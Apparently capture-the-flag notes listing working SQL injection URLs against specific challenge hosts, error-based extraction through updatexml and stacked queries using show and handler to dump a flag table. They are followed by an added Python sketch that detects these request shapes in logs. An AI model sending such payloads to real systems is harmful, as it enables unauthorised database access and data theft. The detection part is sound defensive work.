1. Error-based injection
http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)),1)
http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),0x7e)),1)
http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,substring((select group_concat(flag) from flag),30,30),0x7e)),1)
2. Stacked injection
http://103.47.82.210:8302/?inject=1%27;show%20databases;
http://103.47.82.210:8302/?inject=1%27;use%20supersqli;show%20tables;
http://103.47.82.210:8302/?inject=1%27;use%20supersqli;show%20columns%20from%20`1919810931114514`;
http://103.47.82.210:8302/?inject=1%27;handler%20`1919810931114514`%20open;handler%20`1919810931114514`%20read%20first;
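Added example (not part of the original notes): a log-side detection sketch that flags the two request shapes listed above, error-based extraction through updatexml and stacked statements after a `;`. The rule names, the keyword list and the sample request targets are assumptions constructed for this example, and it goes slightly beyond the page by also decoding double-encoded queries.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Heuristic signatures (assumptions of this example, not a complete rule set).
RULES = {
    # XML functions abused to leak query results through MySQL error text
    "error_based": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    # A statement terminator followed by the keyword of a second statement
    "stacked": re.compile(
        r";\s*(?:show|use|handler|select|insert|update|delete|drop|alter|"
        r"rename|set|prepare)\b", re.I),
    # Metadata enumeration through information_schema
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
}

def decode_query(request_target, max_rounds=3):
    """Percent-decode the query string until it stops changing (bounded)."""
    query = urlsplit(request_target).query
    for _ in range(max_rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def classify(request_target):
    """Return the sorted names of all rules matching the decoded query."""
    query = decode_query(request_target)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

# Constructed request targets; the payload shapes are the ones on this page.
SAMPLES = [
    "/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,"
    "(select group_concat(table_name) from information_schema.tables "
    "where table_schema=database()),0x7e)),1)",
    "/?inject=1%27;show%20databases;",
    "/?inject=1%27;handler%20`1919810931114514`%20open;",
    "/?inject=1%2527%253Bshow%2520databases",   # double-encoded variant
    "/?inject=1",                               # benign request
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target) or ["clean"], target[:50])
```

Signature matching like this is a detection aid only; the fix is parameterized queries and never passing user input to a multi-statement execution call.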